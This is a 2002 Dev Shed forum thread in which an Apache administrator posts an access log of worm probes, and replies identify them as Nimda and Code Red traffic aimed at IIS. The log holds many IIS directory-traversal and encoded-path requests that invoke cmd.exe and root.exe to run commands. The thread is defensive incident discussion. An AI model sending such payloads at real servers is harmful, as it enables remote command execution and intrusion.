#1
Obviously, this was an attack, but the entries were made within the range of 8 seconds of each other. Thankfully, this is directed at a WinNT machine, so I wasn't affected at all. What do you guys think, just a kiddie looking for some fun, or did I fall asleep during a security announcement?

The following is an excerpt of my log files:

204.210.159.60 - - [14/Feb/2002:08:41:16 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:16 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:17 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:18 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:21 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:25 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:25 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:26 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:26 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:27 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:27 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:29 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:32 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:37 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:40 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:46 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:46 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:56 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:57 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:59 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:02 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:03 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:03 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:51 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:53 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:05 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:11 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:14 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:18 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:23 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:29 -1000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:48:52 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:48:55 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:48:57 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:03 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:06 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:09 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:13 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:15 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:21 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:24 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:27 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:52 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:55 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:50:07 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:23:00 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:08 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:11 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:23 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:29 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:35 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:40 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:42 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:47 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:51 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:55 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:59 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:05 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:09 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:13 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:17 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:22 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:26 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:30 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:35 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:38 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:41 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
#2
Not good, you're gonna have to build your servers from scratch.
Just kidding, it's nothing that affects Apache: Nimda, Code Red, whatever, IIS.
#3
204.210.159.60 has Nimda, CodeRed and CodeRedII, which attack your place often. I would suggest you contact his/her ISP to make sure the ISP will get in contact with them to fix their box. I have read a few articles saying that some ISPs will close their accounts until they get those computers fixed as well.
#4
>> Includes log excerpt, not that big
Then don't log them. Start here if that makes you feel more secure when you don't see them in your log. If you need to block them at the firewall level, write a setuid script and insert a dynamic ruleset. If you really care, you should log them a little bit as evidence, then block them on the fly, then report to their ISPs.
Viewing: Dev Shed Forums > System Administration > Apache Development > What do you guys make of this (Includes log excerpt, not that big)